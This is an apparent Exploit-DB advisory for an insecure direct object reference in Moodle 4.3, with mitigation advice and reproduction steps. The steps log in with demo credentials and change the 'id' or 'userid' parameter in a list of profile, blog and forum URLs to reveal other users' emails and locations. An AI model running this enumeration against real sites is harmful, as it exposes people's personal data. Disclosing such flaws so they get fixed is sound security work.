Moodle 4.3 'id' Insecure Direct Object Reference (IDOR)

vendor:

Moodle

by:

tmrswrr

6.1

CVSS

HIGH

Insecure Direct Object Reference (IDOR)

285

CWE

Product Name: Moodle

Affected Version From: 4.3+

Affected Version To: Unknown

Patch Exists: NO

Related CWE:

CPE: a:moodle:moodle

Metasploit:

Other Scripts:

Platforms Tested: Linux

2023

Moodle 4.3 ‘id’ Insecure Direct Object Reference (IDOR)

The vulnerability in Moodle version 4.3 allows an authenticated user to access different user details, email addresses, country, city/town, city, and timezone by manipulating the 'id' parameter in URLs like profile.php?id=11. By changing the 'id' value to another number, the attacker can view information of other users on the platform.

Mitigation:

To mitigate this vulnerability, ensure proper access controls are in place to restrict users from accessing unauthorized information. Additionally, implement input validation to sanitize user inputs and always validate user permissions before displaying sensitive data.

Source

Exploit-DB raw data:

# Exploit Title: Moodle 4.3 'id' Insecure Direct Object Reference (IDOR)
# Date: 20/10/2023
# Exploit Author: tmrswrr
# Vendor Homepage: https://moodle.org/
# Software Demo: https://school.moodledemo.net/
# Version: 4.3+
# Tested on: Linux 


Vulnerability Details
======================

Steps :

1. Log in to the application with the given credentials > USER: teacher PASS: moodle
2. In profile.php?id=11, modify the id Parameter to View User details,
Email address, Country, City/town, City, Timezone
3. Change the existing "id" value to another number 

https://school.moodledemo.net/user/profile.php?id=4
https://school.moodledemo.net/user/profile.php?id=5
https://school.moodledemo.net/user/profile.php?id=10
https://school.moodledemo.net/user/profile.php?id=50

https://school.moodledemo.net/blog/index.php?userid=3
https://school.moodledemo.net/blog/index.php?userid=14

https://school.moodledemo.net/mod/forum/user.php?id=53
https://school.moodledemo.net/mod/forum/user.php?id=50